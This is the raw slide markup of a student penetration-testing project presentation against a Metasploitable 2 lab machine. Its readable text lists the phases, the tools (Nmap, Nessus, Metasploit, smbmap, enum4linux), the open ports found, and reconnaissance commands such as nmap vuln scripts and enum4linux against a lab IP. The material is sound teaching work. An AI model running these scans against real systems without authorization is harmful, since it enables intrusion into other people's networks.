              <a:rPr lang="en-US" sz="2373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Metasploitable 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2373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virtual machine.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3172" y="5290981"/>
            <a:ext cx="455401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The objective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33172" y="5772160"/>
            <a:ext cx="10294571" cy="168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is to identify security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="23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vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="23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, ethically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="23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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="23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them, and provide actionable remediation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="23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recommendations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="23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to enhance security.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4077" y="5574650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74650"/>
            <a:ext cx="3944468" cy="3387216"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="145609" cy="12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9455" y="5574650"/>
            <a:ext cx="3944468" cy="3387216"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="145609" cy="1250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14832" y="5574650"/>
            <a:ext cx="3944468" cy="3387216"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="145609" cy="1250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74811" y="1458484"/>
            <a:ext cx="105383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46421" y="2439426"/>
            <a:ext cx="12795157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PHASES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="62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278052" y="3739770"/>
            <a:ext cx="14323738" cy="41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2300" b="tru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Tools Used:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="true">
                <a:solidFill>
                  <a:srgbClr val="0D92B9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sz="23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Nmap, Nessus, Metasploit, smbmap, enum4linux, Bash scripts.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47961" y="7007444"/>
            <a:ext cx="328745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Exploitation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20945" y="7629733"/>
            <a:ext cx="3697811" cy="80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169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Test vulnerabilities to gain access.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851930" y="5963359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371324" y="6817437"/>
            <a:ext cx="3449975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Vulnerability Scanning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00662" y="7639258"/>
            <a:ext cx="4391298" cy="79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2173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Identify exploitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3260"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2173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 weaknesses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756552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61175" y="5964711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7206" y="7007895"/>
            <a:ext cx="3287455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  <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="225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53245" y="7639258"/>
            <a:ext cx="409537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Gather information about the target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947307" y="5963134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652187" y="7007669"/>
            <a:ext cx="3269758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Maintaining Access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14832" y="7671000"/>
            <a:ext cx="4270686" cy="39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169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Ensure persistent control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2311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5310870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765691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923118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3967748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45593" y="8302044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4191" y="5568248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38007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380068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71436" y="5401743"/>
            <a:ext cx="5299730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Tools:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="225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271436" y="5843508"/>
            <a:ext cx="466362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Nmap, smbmap, enum4linux,</a:t>
            </a:r>
          </a:p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Nessus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595679" y="8135539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Findings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95679" y="8577303"/>
            <a:ext cx="419673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- Open ports (21, 23, 445, 1099, 6667, 8180) and service versions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595679" y="5644448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95679" y="6039212"/>
            <a:ext cx="488299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For identifying open ports and detecting service versions, and running basic vulnerability checks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352943" y="2857354"/>
            <a:ext cx="6906357" cy="2065764"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="254947" cy="7625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52943" y="2857354"/>
            <a:ext cx="1766486" cy="2065764"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="65210" cy="762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848434" y="3502484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415599" y="3197673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Nessus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15599" y="3501121"/>
            <a:ext cx="466362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it Is a powerful vulnerability scanner used to detect security issues in systems and networks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848434" y="5868341"/>
            <a:ext cx="843351" cy="843351"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="843351" w="843351">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="843351" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="843351" y="843350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="843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71" y="91692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9171" y="3316391"/>
            <a:ext cx="7714067" cy="4102923"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4102923" w="7714067">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7714067" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7714067" y="4102923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4102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67" r="0" b="-167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171" y="2605339"/>
            <a:ext cx="7380369" cy="65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 -SN &lt;TARGET-IP&gt;/24:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1851" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="37B4BE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sz="1851" strike="noStrike" u="none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TO IDENTIFY ALL THE MACHINES WHICH IS UP OR DOWN.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56139" y="2605339"/>
            <a:ext cx="7380369" cy="65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 -S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 -SV -P-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&lt;TARGET-IP&gt;:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1851" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="37B4BE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sz="1851" strike="noStrike" u="none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SCANNING IS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1851" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat 1"/>
                <a:ea typeface="Montserrat 1"/>
                <a:cs typeface="Montserrat 1"/>
                <a:sym typeface="Montserrat 1"/>
              </a:rPr>
              <a:t>TO IDENTIFY ALL THE OPEN PORT.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56139" y="3316391"/>
            <a:ext cx="5910641" cy="6634474"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6634474" w="5910641">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5910640" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5910640" y="6634474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6634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70" r="0" b="-51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6964" y="5143500"/>
            <a:ext cx="4508533" cy="553162"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1187433" cy="145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433" cy="145689"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="145689" w="1187433">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1187433" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1187433" y="145689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="145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433" cy="183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71" y="91692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6009" y="2630579"/>
            <a:ext cx="7380369" cy="65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PORT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21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(F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TP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)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:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1851" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="37B4BE"/>
                </a:solidFill>
                <a:latin typeface="Montserrat 1"/>
                <a:ea typeface="Montserrat 1"/>
                <a:cs typeface="Montserrat 1"/>
                <a:sym typeface="Montserrat 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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NMAP -SC -SV -P21 &lt;TARGET-IP&gt;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2915" y="2980182"/>
            <a:ext cx="7380369" cy="23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NMAP --SCRIP</a:t>
            </a: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T VULN -P21 &lt;TARGET-IP&gt;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26009" y="3267381"/>
            <a:ext cx="6031922" cy="4588486"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4588486" w="6031922">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6031923" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6031923" y="4588485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4588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2915" y="3267381"/>
            <a:ext cx="7065228" cy="4808438"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4808438" w="7065228">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7065229" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7065229" y="4808438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4808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57477" y="4680253"/>
            <a:ext cx="1361486" cy="366415"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="358581" cy="965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8581" cy="96504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="96504" w="358581">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="358581" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358581" y="96504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="96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58581" cy="13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92109" y="5102000"/>
            <a:ext cx="2862385" cy="290332"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="753879" cy="76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3879" cy="76466"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="76466" w="753879">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="753879" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="753879" y="76466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="76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53879" cy="114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38090" y="5440749"/>
            <a:ext cx="1762648" cy="324915"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="464236" cy="855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4236" cy="85574"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="85574" w="464236">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="464236" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464236" y="85574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="855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4236" cy="12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8090" y="5643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171" y="916923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RECONNAISSANCE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171" y="2490527"/>
            <a:ext cx="7380369" cy="65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PORT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1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39,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 445(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SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="true" sz="1851" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="37B4BE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) : </a:t>
            </a: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SMB</a:t>
            </a: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MAP -H&lt;TARGET-IP&gt;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0501" y="2909627"/>
            <a:ext cx="7380369" cy="23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66"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pP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ENUM4LIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="true" sz="1851" strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat 1 Bold"/>
                <a:ea typeface="Montserrat 1 Bold"/>
                <a:cs typeface="Montserrat 1 Bold"/>
                <a:sym typeface="Montserrat 1 Bold"/>
              </a:rPr>
              <a:t>UX -A 192.168.214.139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9171" y="3289723"/>
            <a:ext cx="5793037" cy="4585712"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4585712" w="5793037">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5793036" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5793036" y="4585712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4585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6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0501" y="3289723"/>
            <a:ext cx="5557638" cy="4257114"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4257114" w="5557638">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5557639" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5557639" y="4257114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4257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06741" y="3289723"/>
            <a:ext cx="4835039" cy="3469662"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3469662" w="4835039">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4835039" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4835039" y="3469662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="346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DAGnVnAjsY0</dc:identifier>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-08-01T06:04:30Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:title>DEPI-final project_Presentation</dc:title>
</cp:coreProperties>
</file>